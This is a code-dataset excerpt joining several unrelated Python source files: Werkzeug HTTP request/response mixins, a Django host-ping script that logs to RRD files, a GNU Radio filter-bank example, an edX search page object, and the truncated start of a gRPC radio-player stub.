:param path: if the cookie that should be deleted was limited to a
path, the path has to be defined here.
:param domain: if the cookie that should be deleted was limited to a
domain, that domain has to be defined here.
"""
self.set_cookie(key, expires=0, max_age=0, path=path, domain=domain)
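    # Illustrative usage sketch (not part of the original module); assumes
    # `resp` is an instance of a response class built on this base:
    #
    #     resp.set_cookie('session_id', 'abc123', max_age=3600, httponly=True)
    #     resp.delete_cookie('session_id')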
@property
def is_streamed(self):
"""If the response is streamed (the response is not an iterable with
        length information) this property is `True`. In this case streamed
means that there is no information about the number of iterations.
This is usually `True` if a generator is passed to the response object.
This is useful for checking before applying some sort of post
filtering that should not take place for streamed responses.
"""
try:
len(self.response)
except (TypeError, AttributeError):
return True
return False
@property
def is_sequence(self):
"""If the iterator is buffered, this property will be `True`. A
response object will consider an iterator to be buffered if the
response attribute is a list or tuple.
.. versionadded:: 0.6
"""
return isinstance(self.response, (tuple, list))
def close(self):
"""Close the wrapped response if possible. You can also use the object
in a with statement which will automatically close it.
.. versionadded:: 0.9
Can now be used in a with statement.
"""
if hasattr(self.response, 'close'):
self.response.close()
for func in self._on_close:
func()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self.close()
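    # Illustrative usage sketch: because of __enter__/__exit__ above, a
    # response can be used in a ``with`` statement so close() runs
    # automatically; `build_response()` is a hypothetical helper.
    #
    #     with build_response() as resp:
    #         inspect_headers(resp.headers)
    #     # resp.close() has been called at this point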
def freeze(self):
"""Call this method if you want to make your response object ready for
being pickled. This buffers the generator if there is one. It will
also set the `Content-Length` header to the length of the body.
.. versionchanged:: 0.6
The `Content-Length` header is now set.
"""
        # we explicitly convert the response into a list of the *encoded*
        # items, even if the implicit sequence conversion is disabled, and
        # set the Content-Length from that list.
self.response = list(self.iter_encoded())
self.headers['Content-Length'] = str(sum(map(len, self.response)))
def get_wsgi_headers(self, environ):
"""This is automatically called right before the response is started
and returns headers modified for the given environment. It returns a
copy of the headers from the response with some modifications applied
if necessary.
For example the location header (if present) is joined with the root
URL of the environment. Also the content length is automatically set
to zero here for certain status codes.
.. versionchanged:: 0.6
Previously that function was called `fix_headers` and modified
the response object in place. Also since 0.6, IRIs in location
and content-location headers are handled properly.
Also starting with 0.6, Werkzeug will attempt to set the content
length if it is able to figure it out on its own. This is the
case if all the strings in the response iterable are already
encoded and the iterable is buffered.
:param environ: the WSGI environment of the request.
:return: returns a new :class:`~werkzeug.datastructures.Headers`
object.
"""
headers = Headers(self.headers)
location = None
content_location = None
content_length = None
status = self.status_code
# iterate over the headers to find all values in one go. Because
        # get_wsgi_headers is used for each response, this gives us a tiny
# speedup.
for key, value in headers:
ikey = key.lower()
if ikey == u'location':
location = value
elif ikey == u'content-location':
content_location = value
elif ikey == u'content-length':
content_length = value
# make sure the location header is an absolute URL
if location is not None:
old_location = location
if isinstance(location, text_type):
location = iri_to_uri(location)
if self.autocorrect_location_header:
current_url = get_current_url(environ, root_only=True)
if isinstance(current_url, text_type):
current_url = iri_to_uri(current_url)
location = url_join(current_url, location)
if location != old_location:
headers['Location'] = location
# make sure the content location is a URL
if content_location is not None and \
isinstance(content_location, text_type):
headers['Content-Location'] = iri_to_uri(content_location)
# remove entity headers and set content length to zero if needed.
# Also update content_length accordingly so that the automatic
# content length detection does not trigger in the following
# code.
if 100 <= status < 200 or status == 204:
headers['Content-Length'] = content_length = u'0'
elif status == 304:
remove_entity_headers(headers)
# if we can determine the content length automatically, we
# should try to do that. But only if this does not involve
# flattening the iterator or encoding of unicode strings in
# the response. We however should not do that if we have a 304
# response.
if self.automatically_set_content_length and \
self.is_sequence and content_length is None and status != 304:
try:
content_length = sum(len(to_bytes(x, 'ascii')) for x in self.response)
except UnicodeError:
# aha, something non-bytestringy in there, too bad, we
# can't safely figure out the length of the response.
pass
else:
headers['Content-Length'] = str(content_length)
return headers
def get_app_iter(self, environ):
"""Returns the application iterator for the given environ. Depending
on the request method and the current status code the return value
might be an empty response rather than the one from the response.
If the request method is `HEAD` or the status code is in a range
where the HTTP specification requires an empty response, an empty
iterable is returned.
.. versionadded:: 0.6
:param environ: the WSGI environment of the request.
:return: a response iterable.
"""
status = self.status_code
if environ['REQUEST_METHOD'] == 'HEAD' or \
100 <= status < 200 or status in (204, 304):
iterable = ()
elif self.direct_passthrough:
if __debug__:
_warn_if_string(self.response)
return self.response
else:
iterable = self.iter_encoded()
return ClosingIterator(iterable, self.close)
def get_wsgi_response(self, environ):
"""Returns the final WSGI response as tuple. The first item in
the tuple is the application iterator, the second the status and
the third the list of headers. The response returned is created
specially for the given environment. For example if the request
method in the WSGI environment is ``'HEAD'`` the response will
be empty and only the headers and status code will be present.
.. versionadded:: 0.6
:param environ: the WSGI environment of the request.
:return: an ``(app_iter, status, headers)`` tuple.
"""
headers = self.get_wsgi_headers(environ)
app_iter = self.get_app_iter(environ)
return app_iter, self.status, headers.to_wsgi_list()
def __call__(self, environ, start_response):
"""Process this response as WSGI application.
:param environ: the WSGI environment.
:param start_response: the response callable provided by the WSGI
server.
:return: an application iterator
"""
app_iter, status, headers = self.get_wsgi_response(environ)
start_response(status, headers)
return app_iter
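    # Illustrative usage sketch: __call__ above makes a response object usable
    # directly as a WSGI application, assuming the usual
    # Response(body, mimetype=...) constructor:
    #
    #     def application(environ, start_response):
    #         resp = Response('Hello World', mimetype='text/plain')
    #         return resp(environ, start_response)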
class AcceptMixin(object):
"""A mixin for classes with an :attr:`~BaseResponse.environ` attribute
to get all the HTTP accept headers as
:class:`~werkzeug.datastructures.Accept` objects (or subclasses
thereof).
"""
@cached_property
def accept_mimetypes(self):
"""List of mimetypes this client supports as
:class:`~werkzeug.datastructures.MIMEAccept` object.
"""
return parse_accept_header(self.environ.get('HTTP_ACCEPT'), MIMEAccept)
@cached_property
def accept_charsets(self):
"""List of charsets this client supports as
:class:`~werkzeug.datastructures.CharsetAccept` object.
"""
return parse_accept_header(self.environ.get('HTTP_ACCEPT_CHARSET'),
CharsetAccept)
@cached_property
def accept_encodings(self):
"""List of encodings this client accepts. Encodings in a HTTP term
are compression encodings such as gzip. For charsets have a look at
:attr:`accept_charset`.
"""
return parse_accept_header(self.environ.get('HTTP_ACCEPT_ENCODING'))
@cached_property
def accept_languages(self):
"""List of languages this client accepts as
:class:`~werkzeug.datastructures.LanguageAccept` object.
        .. versionchanged:: 0.5
In previous versions this was a regular
:class:`~werkzeug.datastructures.Accept` object.
"""
return parse_accept_header(self.environ.get('HTTP_ACCEPT_LANGUAGE'),
LanguageAccept)
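    # Illustrative usage sketch; assumes `request` mixes this class in and the
    # Accept objects behave like werkzeug.datastructures.Accept:
    #
    #     best = request.accept_mimetypes.best_match(
    #         ['application/json', 'text/html'], default='text/html')
    #     if 'gzip' in request.accept_encodings:
    #         pass  # the client can handle gzip-compressed bodies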
class ETagRequestMixin(object):
"""Add entity tag and cache descriptors to a request object or object with
a WSGI environment available as :attr:`~BaseRequest.environ`. This not
only provides access to etags but also to the cache control header.
"""
@cached_property
def cache_control(self):
"""A :class:`~werkzeug.datastructures.RequestCacheControl` object
for the incoming cache control headers.
"""
cache_control = self.environ.get('HTTP_CACHE_CONTROL')
return parse_cache_control_header(cache_control, None,
RequestCacheControl)
@cached_property
def if_match(self):
"""An object containing all the etags in the `If-Match` header.
:rtype: :class:`~werkzeug.datastructures.ETags`
"""
return parse_etags(self.environ.get('HTTP_IF_MATCH'))
@cached_property
def if_none_match(self):
"""An object containing all the etags in the `If-None-Match` header.
:rtype: :class:`~werkzeug.datastructures.ETags`
"""
return parse_etags(self.environ.get('HTTP_IF_NONE_MATCH'))
@cached_property
def if_modified_since(self):
"""The parsed `If-Modified-Since` header as datetime object."""
return parse_date(self.environ.get('HTTP_IF_MODIFIED_SINCE'))
@cached_property
def if_unmodified_since(self):
"""The parsed `If-Unmodified-Since` header as datetime object."""
return parse_date(self.environ.get('HTTP_IF_UNMODIFIED_SINCE'))
@cached_property
def if_range(self):
"""The parsed `If-Range` header.
.. versionadded:: 0.7
:rtype: :class:`~werkzeug.datastructures.IfRange`
"""
return parse_if_range_header(self.environ.get('HTTP_IF_RANGE'))
@cached_property
def range(self):
"""The parsed `Range` header.
.. versionadded:: 0.7
:rtype: :class:`~werkzeug.datastructures.Range`
"""
return parse_range_header(self.environ.get('HTTP_RANGE'))
class UserAgentMixin(object):
"""Adds a `user_agent` attribute to the request object which contains the
parsed user agent of the browser that triggered the request as a
:class:`~werkzeug.useragents.UserAgent` object.
"""
@cached_property
def user_agent(self):
"""The current user agent."""
from werkzeug.useragents import UserAgent
return UserAgent(self.environ)
class AuthorizationMixin(object):
"""Adds an :attr:`authorization` property that represents the parsed
value of the `Authorization` header as
:class:`~werkzeug.datastructures.Authorization` object.
"""
@cached_property
def authorization(self):
"""The `Authorization` object in parsed form."""
header = self.environ.get('HTTP_AUTHORIZATION')
return parse_authorization_header(header)
class StreamOnlyMixin(object):
"""If mixed in before the request object this will change the bahavior
of it to disable handling of form parsing. This disables the
:attr:`files`, :attr:`form` attributes and will just provide a
:attr:`stream` attribute that however is always available.
.. versionadded:: 0.9
"""
disable_data_descriptor = True
want_form_data_parsed = False
class ETagResponseMixin(object):
"""Adds extra functionality to a response object for etag and cache
handling. This mixin requires an object with at least a `headers`
object that implements a dict like interface similar to
:class:`~werkzeug.datastructures.Headers`.
If you want the :meth:`freeze` method to automatically add an etag, you
    have to mix this class in before the response base class. The default
response class does not do that.
"""
@property
def cache_control(self):
"""The Cache-Control general-header field is used to specify
directives that MUST be obeyed by all caching mechanisms along the
request/response chain.
"""
def on_update(cache_control):
if not cache_control and 'cache-control' in self.headers:
del self.headers['cache-control']
elif cache_control:
self.headers['Cache-Control'] = cache_control.to_header()
return parse_cache_control_header(self.headers.get('cache-control'),
on_update,
ResponseCacheControl)
def make_conditional(self, request_or_environ):
"""Make the response conditional to the request. This method works
best if an etag was defined for the response already. The `add_etag`
method can be used to do that. If called without etag just the date
header is set.
This does nothing if the request method in the request or environ is
anything but GET or HEAD.
It does not remove the body of the response because that's something
the :meth:`__call__` function does for us automatically.
Returns self so that you can do ``return resp.make_conditional(req)``
but modifies the object in-place.
:param request_or_environ: a request object or WSGI environment to be
used to make the response conditional
against.
"""
environ = _get_environ(request_or_environ)
if environ['REQUEST_METHOD'] in ('GET', 'HEAD'):
# if the date is not in the headers, add it now. We however
# will not override an already existing header. Unfortunately
            # this header will be overridden by many WSGI servers including
# wsgiref.
if 'date' not in self.headers:
self.headers['Date'] = http_date()
if 'content-length' not in self.headers:
length = self.calculate_content_length()
if length is not None:
self.headers['Content-Length'] = length
if not is_resource_modified(environ, self.headers.get('etag'), None,
self.headers.get('last-modified')):
self.status_code = 304
return self
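    # Illustrative usage sketch of the pattern described in the docstring
    # above; `render_page()` is a hypothetical view helper and `request`
    # carries the WSGI environ:
    #
    #     resp = Response(render_page())
    #     resp.add_etag()
    #     return resp.make_conditional(request.environ)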
def add_etag(self, overwrite=False, weak=False):
"""Add an etag for the current response if there is none yet."""
if overwrite or 'etag' not in self.headers:
self.set_etag(generate_etag(self.get_data()), weak)
def set_etag(self, etag, weak=False):
"""Set the etag, and override the old one if there was one."""
self.headers['ETag'] = quote_etag(etag, weak)
def get_etag(self):
"""Return a tuple in the form ``(etag, is_weak)``. If there is no
ETag the return value is ``(None, None)``.
"""
return unquote_etag(self.headers.get('ETag'))
def freeze(self, no_etag=False):
"""Call this method if you want to make your response object ready for
        pickling. This buffers the generator if there is one. This also
sets the etag unless `no_etag` is set to `True`.
"""
if not no_etag:
self.add_etag()
super(ETagResponseMixin, self).freeze()
accept_ranges = header_property('Accept-Ranges', doc='''
The `Accept-Ranges` header. Even though the name would indicate
that multiple values are supported, it must be one string token only.
The values ``'bytes'`` and ``'none'`` are common.
.. versionadded:: 0.7''')
def _get_content_range(self):
def on_update(rng):
if not rng:
del self.headers['content-range']
else:
self.headers['Content-Range'] = rng.to_header()
rv = parse_content_range_header(self.headers.get('content-range'),
on_update)
# always provide a content range object to make the descriptor
# more user friendly. It provides an unset() method that can be
# used to remove the header quickly.
if rv is None:
rv = ContentRange(None, None, None, on_update=on_update)
return rv
def _set_content_range(self, value):
if not value:
del self.headers['content-range']
elif isinstance(value, string_types):
self.headers['Content-Range'] = value
else:
self.headers['Content-Range'] = value.to_header()
content_range = property(_get_content_range, _set_content_range, doc='''
The `Content-Range` header as
:class:`~werkzeug.datastructures.ContentRange` object. Even if the
        header is not set it will provide such an object for easier
manipulation.
.. versionadded:: 0.7''')
del _get_content_range, _set_content_range
class ResponseStream(object):
"""A file descriptor like object used by the :class:`ResponseStreamMixin` to
represent the body of the stream. It directly pushes into the response
iterable of the response object.
"""
mode = 'wb+'
def __init__(self, response):
self.response = response
self.closed = False
def write(self, value):
if self.closed:
raise ValueError('I/O operation on closed file')
self.response._ensure_sequence(mutable=True)
self.response.response.append(value)
def writelines(self, seq):
for item in seq:
self.write(item)
def close(self):
self.closed = True
def flush(self):
if self.closed:
raise ValueError('I/O operation on closed file')
def isatty(self):
if self.closed:
raise ValueError('I/O operation on closed file')
return False
@property
def encoding(self):
return self.response.charset
class ResponseStreamMixin(object):
"""Mixin for :class:`BaseRequest` subclasses. Classes that inherit from
this mixin will automatically get a :attr:`stream` property that provides
a write-only interface to the response iterable.
"""
@cached_property
def stream(self):
"""The response iterable as write-only stream."""
return ResponseStream(self)
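    # Illustrative usage sketch: with this mixin applied, the response body
    # can be built up incrementally through the write-only stream:
    #
    #     resp = Response(mimetype='text/plain')
    #     resp.stream.write('first chunk\n')
    #     resp.stream.writelines(['second\n', 'third\n'])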
class CommonRequestDescriptorsMixin(object):
"""A mixin for :class:`BaseRequest` subclasses. Request objects that
mix this class in will automatically get descriptors for a couple of
HTTP headers with automatic type conversion.
.. versionadded:: 0.5
"""
content_type = environ_property('CONTENT_TYPE', doc='''
The Content-Type entity-header field indicates the media type of
the entity-body sent to the recipient or, in the case of the HEAD
method, the media type that would have been sent had the request
been a GET.''')
@cached_property
def content_length(self):
"""The Content-Length entity-header field indicates the size of the
entity-body in bytes or, in the case of the HEAD method, the size of
the entity-body that would have been sent had the request been a
GET.
"""
return get_content_length(self.environ)
content_encoding = environ_property('HTTP_CONTENT_ENCODING', doc='''
The Content-Encoding entity-header field is used as a modifier to the
media-type. When present, its value indicates what additional content
codings have been applied to the entity-body, and thus what decoding
mechanisms must be applied in order to obtain the media-type
referenced by the Content-Type header field.
.. versionadded:: 0.9''')
content_md5 = environ_property('HTTP_CONTENT_MD5', doc='''
The Content-MD5 entity-header field, as defined in RFC 1864, is an
MD5 digest of the entity-body for the purpose of providing an
end-to-end message integrity check (MIC) of the entity-body. (Note:
a MIC is good for detecting accidental modification of the
entity-body in transit, but is not proof against malicious attacks.)
.. versionadded:: 0.9''')
referrer = environ_property('HTTP_REFERER', doc='''
The Referer[sic] request-header field allows the client to specify,
for the server's benefit, the address (URI) of the resource from which
the Request-URI was obtained (the "referrer", although the header
field is misspelled).''')
date = environ_property('HTTP_DATE', None, parse_date, doc='''
The Date general-header field represents the date and time at which
the message was originated, having the same semantics as orig-date
in RFC 822.''')
max_forwards = environ_property('HTTP_MAX_FORWARDS', None, int, doc='''
The Max-Forwards request-header field provides a mechanism with the
TRACE and OPTIONS methods to limit the number of proxies or gateways
that can forward the request to the next inbound server.''')
def _parse_content_type(self):
if not hasattr(self, '_parsed_content_type'):
self._parsed_content_type = \
parse_options_header(self.environ.get('CONTENT_TYPE', ''))
@property
def mimetype(self):
"""Like :attr:`content_type` but without parameters (eg, without
charset, type etc.). For example if the content
type is ``text/html; charset=utf-8`` the mimetype would be
``'text/html'``.
"""
self._parse_content_type()
return self._parsed_content_type[0]
@property
def mimetype_params(self):
"""The mimetype parameters as dict. For example if the content
type is ``text/html; charset=utf-8`` the params would be
``{'charset': 'utf-8'}``.
"""
self._parse_content_type()
return self._parsed_content_type[1]
@cached_property
def pragma(self):
"""The Pragma general-header field is used to include
implementation-specific directives that might apply to any recipient
along the request/response chain. All pragma directives specify
optional behavior from the viewpoint of the protocol; however, some
systems MAY require that behavior be consistent with the directives.
"""
return parse_set_header(self.environ.get('HTTP_PRAGMA', ''))
class CommonResponseDescriptorsMixin(object):
"""A mixin for :class:`BaseResponse` subclasses. Response objects that
mix this class in will automatically get descriptors for a couple of
HTTP headers with automatic type conversion.
"""
def _get_mimetype(self):
ct = self.headers.get('content-type')
if ct:
return ct.split(';')[0].strip()
def _set_mimetype(self, value):
self.headers['Content-Type'] = get_content_type(value, self.charset)
def _get_mimetype_params(self):
def on_update(d):
self.headers['Content-Type'] = \
dump_options_header(self.mimetype, d)
d = parse_options_header(self.headers.get('content-type', ''))[1]
return CallbackDict(d, on_update)
mimetype = property(_get_mimetype, _set_mimetype, doc='''
The mimetype (content type without charset etc.)''')
mimetype_params = property(_get_mimetype_params, doc='''
The mimetype parameters as dict. For example if the content
type is ``text/html; charset=utf-8`` the params would be
``{'charset': 'utf-8'}``.
.. versionadded:: 0.5
''')
location = header_property('Location', doc='''
The Location response-header field is used to redirect the recipient
to a location other than the Request-URI for completion of the request
or identification of a new resource.''')
age = header_property('Age', None, parse_date, http_date, doc='''
The Age response-header field conveys the sender's estimate of the
amount of time since the response (or its revalidation) was
generated at the origin server.
Age values are non-negative decimal integers, representing time in
seconds.''')
content_type = header_property('Content-Type', doc='''
The Content-Type entity-header field indicates the media type of the
entity-body sent to the recipient or, in the case of the HEAD method,
the media type that would have been sent had the request been a GET.
''')
content_length = header_property('Content-Length', None, int, str, doc='''
The Content-Length entity-header field indicates the size of the
entity-body, in decimal number of OCTETs, sent to the recipient or,
in the case of the HEAD method, the size of the entity-body that would
have been sent had the request been a GET.''')
content_location = header_property('Content-Location', doc='''
The Content-Location entity-header field MAY be used to supply the
resource location for the entity enclosed in the message when that
entity is accessible from a location separate from the requested
resource's URI.''')
content_encoding = header_property('Content-Encoding', doc='''
The Content-Encoding entity-header field is used as a modifier to the
media-type. When present, its value indicates what additional content
codings have been applied to the entity-body, and thus what decoding
mechanisms must be applied in order to obtain the media-type
referenced by the Content-Type header field.''')
content_md5 = header_property('Content-MD5', doc='''
The Content-MD5 entity-header field, as defined in RFC 1864, is an
MD5 digest of the entity-body for the purpose of providing an
end-to-end message integrity check (MIC) of the entity-body. (Note:
a MIC is good for detecting accidental modification of the
entity-body in transit, but is not proof against malicious attacks.)
''')
date = header_property('Date', None, parse_date, http_date, doc='''
The Date general-header field represents the date and time at which
the message was originated, having the same semantics as orig-date
in RFC 822.''')
expires = header_property('Expires', None, parse_date, http_date, doc='''
The Expires entity-header field gives the date/time after which the
response is considered stale. A stale cache entry may not normally be
returned by a cache.''')
last_modified = header_property('Last-Modified', None, parse_date,
http_date, doc='''
The Last-Modified entity-header field indicates the date and time at
which the origin server believes the variant was last modified.''')
def _get_retry_after(self):
value = self.headers.get('retry-after')
if value is None:
return
elif value.isdigit():
return datetime.utcnow() + timedelta(seconds=int(value))
return parse_date(value)
def _set_retry_after(self, value):
if value is None:
if 'retry-after' in self.headers:
del self.headers['retry-after']
return
elif isinstance(value, datetime):
value = http_date(value)
else:
value = str(value)
self.headers['Retry-After'] = value
retry_after = property(_get_retry_after, _set_retry_after, doc='''
The Retry-After response-header field can be used with a 503 (Service
Unavailable) response to indicate how long the service is expected
to be unavailable to the requesting client.
Time in seconds until expiration or date.''')
def _set_property(name, doc=None):
def fget(self):
def on_update(header_set):
if not header_set and name in self.headers:
del self.headers[name]
elif header_set:
self.headers[name] = header_set.to_header()
return parse_set_header(self.headers.get(name), on_update)
def fset(self, value):
if not value:
del self.headers[name]
elif isinstance(value, string_types):
self.headers[name] = value
else:
self.headers[name] = dump_header(value)
return property(fget, fset, doc=doc)
vary = _set_property('Vary', doc='''
The Vary field value indicates the set of request-header fields that
fully determines, while the response is fresh, whether a cache is
permitted to use the response to reply to a subsequent request
without revalidation.''')
content_language = _set_property('Content-Language', doc='''
The Content-Language entity-header field describes the natural
language(s) of the intended audience for the enclosed entity. Note
that this might not be equivalent to all the languages used within
the entity-body.''')
allow = _set_property('Allow', doc='''
The Allow entity-header field lists the set of methods supported
by the resource identified by the Request-URI. The purpose of this
field is strictly to inform the recipient of valid methods
associated with the resource. An Allow header field MUST be
present in a 405 (Method Not Allowed) response.''')
del _set_property, _get_mimetype, _set_mimetype, _get_retry_after, \
_set_retry_after
class WWWAuthenticateMixin(object):
"""Adds a :attr:`www_authenticate` property to a response object."""
@property
def www_authenticate(self):
"""The `WWW-Authenticate` header in a parsed form."""
def on_update(www_auth):
if not www_auth and 'www-authenticate' in self.headers:
del self.headers['www-authenticate']
elif www_auth:
self.headers['WWW-Authenticate'] = www_auth.to_header()
header = self.headers.get('www-authenticate')
return parse_www_authenticate_header(header, on_update)
class Request(BaseRequest, AcceptMixin, ETagRequestMixin,
UserAgentMixin, AuthorizationMixin,
CommonRequestDescriptorsMixin):
"""Full featured request object implementing the following mixins:
- :class:`AcceptMixin` for accept header parsing
- :class:`ETagRequestMixin` for etag and cache control handling
- :class:`UserAgentMixin` for user agent introspection
- :class:`AuthorizationMixin` for http auth handling
- :class:`CommonRequestDescriptorsMixin` for common headers
"""
class PlainRequest(StreamOnlyMixin, Request):
"""A request object without special form parsing capabilities.
.. versionadded:: 0.9
"""
class Response(BaseResponse, ETagResponseMixin, ResponseStreamMixin,
CommonResponseDescriptorsMixin,
WWWAuthenticateMixin):
"""Full featured response object implementing the following mixins:
- :class:`ETagResponseMixin` for etag and cache control handling
- :class:`ResponseStreamMixin` to add support for the `stream` property
- :class:`CommonResponseDescriptorsMixin` for various HTTP descriptors
- :class:`WWWAuthenticateMixin` for HTTP authentication support
"""
| apache-2.0 |
sygard/dns_mdb | scripts/rrd_service.py | 1 | 4083 | #!/usr/bin/env python
# coding: utf-8
import os,sys,datetime,argparse,threading,time,Queue
from commands import getstatusoutput
parser = argparse.ArgumentParser(description = 'Ping hosts from mdb')
parser.add_argument('-t', '--type', default='all',\
help="Which type of host to operate on")
parser.add_argument('-d', '--debug', action='store_true',\
help="Turn on debugging")
parser.add_argument('--show-types', dest='show_types', action='store_true',\
help='Show available host types')
parser.add_argument('--num-threads', dest='num_threads', type=int, default=1,\
help='Number of threads used for pinging hosts')
parser.add_argument('--num-pings', dest='num_pings', type=int, default=5,\
help='Number of ping requests to each host. More requests gives a more accurate average calculation.')
parser.add_argument('--rrd-path', dest='rrd_path', required=True,\
help='Specify the path to the rrd files')
args = parser.parse_args()
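# Example invocation (illustrative values only; adjust the paths and host type
# to your installation):
#   ./rrd_service.py --rrd-path /var/lib/mdb-rrd --type server --num-threads 4 -d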
from django.core.management import setup_environ
from django.core.mail import mail_admins
from dns_mdb import settings
setup_environ(settings)
from mdb.models import *
PING_CMD='ping -W 1 -c %d -n -q %s | grep rtt | cut -d " " -f4'
queue = Queue.Queue()
RRD_CREATE = "%s " \
"DS:ttl:GAUGE:600:U:U "\
"RRA:AVERAGE:0.5:1:576 "\
"RRA:AVERAGE:0.5:6:336 "\
"RRA:AVERAGE:0.5:72:124 "\
"RRA:AVERAGE:0.5:288:365"
RRD_UPDATE = "%s --template rtt N:%s"
RRD_DIR = args.rrd_path
RRDTOOL = "/usr/bin/rrdtool"
class RrdService():
def log(self, host, interface, avg_ping):
rrd = self.get_rrd(host, interface)
self.update_rrd(rrd, avg_ping)
def get_rrd(self, host, interface):
return "%s/%s_%s.rrd" % ( RRD_DIR, host.id,\
interface.id)
def update_rrd(self, rrd, avg_ping):
self.create_rrd(rrd)
self.rrd_exec("update", RRD_UPDATE % (rrd, avg_ping))
def create_rrd(self, rrd):
if os.path.isfile(rrd):
return True
if args.debug:
print "Creating rrd: " + rrd
if not self.rrd_exec("create", RRD_CREATE % rrd):
if args.debug:
print "Could not create RRD database."
return False
return True
def rrd_exec(self, function, rrd_cmd):
cmd = "%s %s %s" % (RRDTOOL, function, rrd_cmd)
if args.debug:
print "RRD_EXEC (%s)" % cmd
if os.system(cmd) != 0:
return False
else:
return True
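    # Illustrative example (made-up ids and value) of the shell command
    # rrd_exec builds for an update of host 12, interface 34:
    #   /usr/bin/rrdtool update <rrd_path>/12_34.rrd --template rtt N:0.42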
class PingThread(threading.Thread):
""" Threaded ping """
def __init__(self, host_queue, rrd_service):
threading.Thread.__init__(self)
self.queue = queue
self.rrd_service = rrd_service
def run(self):
while True:
host = self.queue.get()
self.do_ping_host(host)
self.queue.task_done()
def do_ping_host(self, host):
interfaces = host.interface_set.all()
for interface in interfaces:
self.do_ping_interface(interface, host)
def do_ping_interface(self, interface, host):
res = self.do_ping_ipaddr(interface.ip4address.address)
if res == None:
if args.debug:
print "%s (%s/%s) : fail " % (host, \
interface.name, interface.ip4address.address)
return
if args.debug:
print "%s (%s/%s) : %s" % (host, interface.name, \
interface.ip4address.address, res)
self.rrd_service.log(host,interface, res[1])
def do_ping_ipaddr(self, ipaddr):
status, output = getstatusoutput(PING_CMD % (args.num_pings,ipaddr))
if status == 0 and len(output) > 0:
return output.split("/")
else:
return None
def show_host_types():
types = HostType.objects.all()
for t in types:
print "%s (%s)" % (t.host_type, t.description)
if args.show_types:
show_host_types()
sys.exit(0)
if args.type == "all":
hosts = Host.objects.all()
else:
hosts = Host.objects.filter(host_type__host_type = args.type)
rrd_service = RrdService()
# start num_threads threads for pinging
for i in xrange(args.num_threads):
t = PingThread(queue, rrd_service)
t.setDaemon(True)
t.start()
if args.debug:
print "Pinging %d hosts using %d threads." % (len(hosts), args.num_threads)
# Add all hosts to the queue. Ping threads
# will pick hosts from this queue.
for host in hosts:
queue.put(host)
# Wait for all threads to finish, eg. queue is empty.
queue.join()
sys.exit(0)
| gpl-2.0 |
jarn0ld/gnuradio | gr-filter/examples/synth_filter.py | 58 | 2552 | #!/usr/bin/env python
#
# Copyright 2010,2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr
from gnuradio import filter
from gnuradio import blocks
import sys
try:
from gnuradio import analog
except ImportError:
sys.stderr.write("Error: Program requires gr-analog.\n")
sys.exit(1)
try:
import scipy
except ImportError:
sys.stderr.write("Error: Program requires scipy (see: www.scipy.org).\n")
sys.exit(1)
try:
import pylab
except ImportError:
sys.stderr.write("Error: Program requires matplotlib (see: matplotlib.sourceforge.net).\n")
sys.exit(1)
def main():
N = 1000000
fs = 8000
freqs = [100, 200, 300, 400, 500]
nchans = 7
sigs = list()
for fi in freqs:
s = analog.sig_source_c(fs, analog.GR_SIN_WAVE, fi, 1)
sigs.append(s)
taps = filter.firdes.low_pass_2(len(freqs), fs,
fs/float(nchans)/2, 100, 100)
print "Num. Taps = %d (taps per filter = %d)" % (len(taps),
len(taps)/nchans)
filtbank = filter.pfb_synthesizer_ccf(nchans, taps)
head = blocks.head(gr.sizeof_gr_complex, N)
snk = blocks.vector_sink_c()
tb = gr.top_block()
tb.connect(filtbank, head, snk)
for i,si in enumerate(sigs):
tb.connect(si, (filtbank, i))
tb.run()
if 1:
f1 = pylab.figure(1)
s1 = f1.add_subplot(1,1,1)
s1.plot(snk.data()[1000:])
fftlen = 2048
f2 = pylab.figure(2)
s2 = f2.add_subplot(1,1,1)
winfunc = scipy.blackman
s2.psd(snk.data()[10000:], NFFT=fftlen,
Fs = nchans*fs,
noverlap=fftlen/4,
window = lambda d: d*winfunc(fftlen))
pylab.show()
if __name__ == "__main__":
main()
| gpl-3.0 |
xuxiao19910803/edx | common/test/acceptance/pages/lms/courseware_search.py | 81 | 1330 | """
Courseware search
"""
from .course_page import CoursePage
class CoursewareSearchPage(CoursePage):
"""
Coursware page featuring a search form
"""
url_path = "courseware/"
search_bar_selector = '#courseware-search-bar'
@property
def search_results(self):
""" search results list showing """
return self.q(css='#courseware-search-results')
def is_browser_on_page(self):
""" did we find the search bar in the UI """
return self.q(css=self.search_bar_selector).present
def enter_search_term(self, text):
""" enter the search term into the box """
self.q(css=self.search_bar_selector + ' input[type="text"]').fill(text)
def search(self):
""" execute the search """
self.q(css=self.search_bar_selector + ' [type="submit"]').click()
self.wait_for_element_visibility('.search-info', 'Search results are shown')
def search_for_term(self, text):
"""
Fill input and do search
"""
self.enter_search_term(text)
self.search()
def clear_search(self):
"""
Clear search bar after search.
"""
self.q(css=self.search_bar_selector + ' .cancel-button').click()
self.wait_for_element_visibility('#course-content', 'Search bar is cleared')
| agpl-3.0 |
mKaloer/rpi-radio-player | web-radio/web-radio/radiomessages_pb2_grpc.py | 2 | 4849 | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
import google.protobuf.empty_pb2 as google_dot_protobuf_dot_empty__pb2
import radiomessages_pb2 as radiomessages__pb2
class RadioStub(object):
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Play = channel.unary_unary(
'/Radio/Play',
request_serializer=radiomessages__pb2.PlayRequest.SerializeToString,
response_deserializer=radiomessages__pb2.StatusResponse.FromString,
)
self.Stop = channel.unary_unary(
'/Radio/Stop',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=radiomessages__pb2.StatusResponse.FromString,
)
self.Status = channel.unary_unary(
'/Radio/Status',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=radiomessages__pb2.StatusResponse.FromString,
)
self.SetVolume = channel.unary_unary(
'/Radio/SetVolume',
